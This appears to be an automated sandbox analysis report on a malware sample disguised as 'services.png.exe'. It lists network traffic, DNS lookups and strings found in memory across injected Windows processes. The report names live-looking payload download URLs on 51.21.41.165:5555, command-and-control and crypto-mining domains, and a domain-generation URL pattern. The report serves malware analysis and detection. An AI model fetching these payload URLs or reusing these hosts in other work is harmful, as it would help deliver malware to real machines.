Source: global traffic	HTTP traffic detected: GET /smbhost.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /SearchUI.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.51
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165
Source: unknown	TCP traffic detected without corresponding DNS query: 51.21.41.165

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00425010 getaddrinfo,freeaddrinfo,getsockname,getpeername,recv,recvfrom,getaddrinfo,freeaddrinfo,sendto,recvfrom,sendto,select,

0_2_00425010

Source: global traffic	HTTP traffic detected: GET /webhp?gws_rd=ssl HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Cache-Control: no-cacheHost: www.google.comConnection: CloseCookie: AEC=AVcja2fZ5WoToRr8N0EKwXEQHhpU0b7fMrW843GyTClJXu_gwVa_4Pyv2w; NID=521=ghRckTstDGUFWLLeGG59dPxXLE5arcREGZ79_4NQ9dnMJUjGl2efELGFvPE8r53aIGZ9-m7D1otiKeeMO4NAmx9vJv_XceVM4ed_sLcgqM8jkysPWnq03BiDjW41P4JdGFGTI8o9RNbzQtedai-JTyBLx9iGgp5FQKMaiLtWnKU_6QcwgAv-PutmFhhN7cDd4lW0TeQdfH1jJ2Y
Source: global traffic	HTTP traffic detected: GET /webhp HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /UIServices.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /smbhost.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /SearchUI.exe HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: saba.royalreturns.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 159.228.9.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ghostrider.mine.zergpool.com
Source: global traffic	DNS traffic detected: DNS query: rentry.co
Source: global traffic	DNS traffic detected: DNS query: xm.centralmarketingkur.com

Source: unknown

HTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 130Connection: Keep-AliveCache-Control: no-cache

Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.php
Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.phpfileipfilewww.www.
Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u//%s/%s%sX-Type:
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exe
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exe)
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exeK
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exeZ
Source: nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.0000000000704000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626159031.0000000000703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exed
Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/SearchUI.exekg
Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exe
Source: nyheukpo.exe, 00000001.00000003.2745628662.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2884030951.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.3018778650.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exe)
Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exe5
Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exe:
Source: nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exeMicrosoft
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exed
Source: nyheukpo.exe, 00000001.00000003.2745628662.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2884030951.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.3018778650.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exep
Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/UIServices.exex
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exe
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exe-
Source: nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exe32
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exe:5555/smbhost.exe
Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578230111.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589820943.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exeF
Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exectur
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exeer
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exeerO
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exeo
Source: nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exep
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.21.41.165:5555/smbhost.exey
Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: svchost.exe, 00000004.00000000.1734893699.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1734907656.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3016773991.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3018089478.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3089421963.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: SearchApp.exe, 0000000A.00000000.1812304098.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000000.1749104971.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3100896455.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3082707450.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.3008868601.000001ECFC470000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: nyheukpo.exe, 00000001.00000003.2181887191.000000000222D000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627714144.00000000040E5000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2466982292.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181579380.0000000002225000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181692278.000000000222D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://staa.com/
